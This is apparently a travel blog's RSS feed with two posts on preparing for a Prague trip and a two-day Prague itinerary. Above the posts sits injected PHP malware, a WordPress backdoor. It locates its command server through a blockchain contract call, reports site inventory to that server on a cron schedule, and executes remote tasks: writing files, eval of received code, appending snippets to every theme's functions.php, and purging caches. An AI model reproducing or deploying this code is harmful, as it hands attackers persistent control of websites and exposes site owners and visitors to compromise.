// fv_ar if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/home4/thetioc4/public_html/wp-content/plugins/hseo/hseo.php', 'ctrl'=>'// fv_ar', 'vis'=>'// cy_9y', 'vis_func'=>'wp_4ypppc', 'vis_paths'=>array('/home4/thetioc4/public_html/wp-content/plugins/hseo/hseo.php'), 'opt'=>'_wp_mpcoh6kq', ); $keys=array(); $keys['id']='3vd'; $keys['ver']='81'; $keys['caps']='y6q'; $keys['tasks']='pkj'; $keys['interval']='ab9'; $keys['ack_id']='b02'; $keys['ok']='5y'; $keys['detail']='il6'; $keys['inv']='03n'; $keys['result']='kps'; $hdr='X-5JS-Auth';$tok='Wa8sxSTP86ECKu7_mOyIhrwxSEuHA--n5NSAtZOXais';$id='b25552bf29d1173a';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); }); Czech Republic – The Tiny Traveler Blog https://thetinytravelerblog.com Thu, 09 May 2024 23:03:51 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 How to Prepare for Your Trip to Prague: everything you need to know. https://thetinytravelerblog.com/how-to-prepare-for-your-trip-to-prague/ https://thetinytravelerblog.com/how-to-prepare-for-your-trip-to-prague/#respond Mon, 22 Apr 2024 11:11:15 +0000 http://thetinytravelerblog.com/?p=1599 Prague is a city like no other. The city has a variety to see even outside of the famous old town. However, before starting your research on all the things you need to do in Prague, let’s start with the basics. Preparing for your trip like how to get to and from the airport, or the best areas to stay, is important in the planning process.

Here is a few pieces of information that I felt would be helpful to those visiting Prague for the first time.

Where to stay

Like in any country, there are loads of options whether it be hostels, hotels or airbnbs. Many times in Europe I choose hostels because they are an amazing way to meet other travelers, often provide inexpensive or free meals, and are much cheaper than a hotel or home.

The best resource that I use is Hostelworld.com. It is extremely user friendly and gives you all the information you need to know. The hostel I chose in Prague was Hostel One Home. I was really happy with my choice as they provided a great family atmosphere, having free dinner and drinking games each night. The rooms were clean and the staff was all friendly and respectful.

The other option I will forever support is airbnb. Make sure to read the reviews, look at 5 stars only, and it will not go wrong.

If you have never used Airbnb before, click on the link here to get $40 off your first stay.

As far as location, make sure to look closer in the city center close to old town. Here is where you will be centrally located to easily get to all the other areas of the city that you will want to go.

How to get from the Airport to the city center

Getting to and from the airport can be simple in Prague, depending on where you are staying. I’d recommend looking on google maps to see your options from the airport to your destination and see if there is a bus that will take you close by. Here are a few options that I used:

  • Airport express bus: This express bus goes straight into the city to the Prague Main Station. It runs from about 5:30am until about 10pm. It is just 60CZK, which is about $2. However, they do only accept cash so you will need to get some change before you get on.
  • Uber/Taxi: Uber and taxi is always an option, but expect to pay around $25 into the city.

The currency & taking out money

Although Czech Republic is part of the EU, it still somehow doesn’t have the euro. So you will receive the Czech Koruna (pronounced ‘crown’). An easy way to calculate it into US dollars is to remove the last digit and divide by 2. For example, if the price is 100 CZK, you’d remove the last 0 and divide it by 2. So it would be $5. Make sense?!

You can exchange money at a local bank or at the airport, or a fun tip is if you have euros, you can go to a larger store or fast food chain and they will give you back change in koruna’s.

Another option is to take money out from an ATM. There is usually a fee to do it this way, but if you are traveling often, I would recommend looking into a bank account that reimburses the fees. In the US, Charles Schwabb has a checking account that reimburses – fun tip!

How to get around during your stay

Prague has a lot of fun ways to get around the city. While I usually prefer getting around by foot, if you are on a time crunch and need to explore the city quickly, there are a few other options.

  • Uber: this is the cheapest way by car to get around, just like in many countries.
  • LimeBike: a motorized scooter that will get you from A to B quicker than by foot – and it is so fun! Make sure to download the app before you go.
  • City Bike or rent a bike: You can rent a bike or like LimeBike, you can hop on a city bike and ride around until you get to your next destination.

What to wear

Wine festival in Prague, Czech Republic

Generally in Europe, I tend to stay away from any American trends – AKA booty shorts or 3/4 leggings – to make sure I don’t look like a complete tourist. Ok ok seriously though, I do dress more conservative, wear more black and bring less color.

Plan to bring sneakers as you will be walking a lot. Avoid wasting your space with heels, as many of the roads are cobblestone and it will be extremely exhausting and uncomfortable.

During the months of Sept-May, plan to bring layers as it can get relatively cold at night. Don’t be stubborn like me and not bring a jacket!

This post contains affiliate links. What that means is if you click through and purchase something, I may make a small commission at no extra cost to you. This helps me continue running this blog and bringing you the best content possible. I would never promote something I truly don’t believe in or use! Thank you for your support in advance!

]]>
https://thetinytravelerblog.com/how-to-prepare-for-your-trip-to-prague/feed/ 0
Ultimate 2-day Itinerary for Prague https://thetinytravelerblog.com/2-day-itinerary-prague/ https://thetinytravelerblog.com/2-day-itinerary-prague/#respond Thu, 20 Jun 2019 09:00:53 +0000 http://thetinytravelerblog.com/?p=1602 For those living in the States, it’s normal to plan a 1-2 week vacation to Europe to cross off as many hot spots as possible. For those living in Europe, it’s much more simple to travel for a long weekend to other European destinations. Therefore, a 2-day weekend itinerary for Prague is more common than not.

Prague is a larger city than what you may think. Going into it, I thought it was a smaller, walkable city. I quickly realized that it has several neighborhoods to explore with so much to see. If you do have just 2 days, this is my recommendation for making the most of your time.

Also take a look at my blog post on how to prepare for your trip to Prague so you waste zero time on figuring things out when you arrive. Now let’s get into it!


Day 1: a full day experience

Morning – Nusle

Waf Waf restaurant in Prague is the perfect place for breakfast. Their waffles and pancakes are delicious and so picturesque.

The first day is a perfect one to explore out of the city center and into more of a local area. The area of Nusle is a local, more “hipster” area. There are several coffee shops, parks and old architecture to view. You can head to Waf-Waf for a fancy waffle or stack of pancakes. They are not only delicious, but definitely picture worthy.

If you’re a coffee or tea drinker, explore the areas best coffee shops. A few are Anthill, Monolok cafe, and Boheme Cafe.

Afternoon – explore by scooter

Now that you are all stuffed and energized from the food and coffee, wandering around Nusle and enjoying the parks will be your next move. You can start making your way towards Park Folimanka then to Vyšehrad, which is a castle and museum. The river across the street is also perfect to relax and sit down for a bit to rest your feet.

Lounge by the river in Prague  to get a more local experience. Here is my 2-day itinerary for Prague.

After wandering around, pick up a Lime scooter and ride along the river towards the Charles Bridge. Make sure to download the app beforehand so it is quick and easy to rent. It’s a perfect way to explore the city if you are on a time constraint. Normally I would walk around, but the scooter experience was seriously so much fun!

After the scooter ride, spot the Dancing House which is two bridges down from Charles Bridge. It’s quite unique if I may say so myself!

Night – old town, dinner & cave bars

Ride the scooter or walk back into the Old Town square. Once you arrive, there are vendors that you can peek around and shop at along with food. I recommend getting dessert before dinner and grab the famous ice cream called Trdelnik. It’s basically a deep fried donut in place of a cone with ice cream in the middle. Absolutely worth it!

Trdelnik ice cream in Prague has to be on your to do list. In Old Town Prague there is several vendors and you will have a beautiful view too.

For dinner, if you are staying at Hostel One Home, which I recommend, they have family dinners for free every night. If you are on a budget and looking to make new friends, I recommend this option.

If not, there are many delicious restaurants in the city. I only did dinner at the hostel, so I will send you over to Getting Stamped for restaurant recommendations.

After dinner, you have to get a beer or two at Prague’s underground bars. They are extremely unique and a perfect place to relax and chat with locals or other travelers. Here are a few you should try:

Day 2: morning wake up call

Morning – explore with the sun

You may not like this, but I’m about to tell you to wake up for sunrise. Yes, sunrise in the cities are the best to experience attractions with minimal crowds. This is why I saved wandering over the Charles Bridge, the John Lennon Wall and the Prague Castle for this moment.

The Charles Bridge in Prague is best at sunrise when the crowds are still sleeping.

Prague Castle has a stunning view overlooking the city. Not only that, there will most likely not be anyone else there with you. You can take in the architecture and beauty of the area all by yourself.

The John Lennon wall brings art and history together for a positive and peaceful message.

After the suns come up, it will be time to get some breakfast. Den Noc is my preference, mainly because of their insanely delicious pancake options with real maple syrup. Cafe Savoy is also a popular option that locals recommend.

Afternoon – nap or grab a free tour

I need my sleep, so I personally went back to the hostel to take a quick cat nap. If you are ready to attack the day and can fight the exhaustion, then keep going.

Europe in general has several free or paid walking tours. One of the free walking tours is run by Sandeman’s New Europe tours. Check them out to explore times and book yours today. While exploring cities on your own give you more freedom, it’s always good to have a guide. History and culture is a reason to travel and see the world, so learn and embrace it however long you can.

Night – flight home

Assuming you are truly here for just two days, then your flight is most likely in the late afternoon or night. Relax, pack up and give yourself some time to get to the airport. If you are taking the express bus to the airport, you can grab a yummy hot dog on the way out!

This post contains affiliate links. What that means is if you click through and purchase something, I may make a small commission at no extra cost to you. This helps me continue running this blog and bringing you the best content possible. I would never promote something I truly don’t believe in or use! Thank you for your support in advance!

Ultimate 2-day itinerary to Prague Pinterest

]]>
https://thetinytravelerblog.com/2-day-itinerary-prague/feed/ 0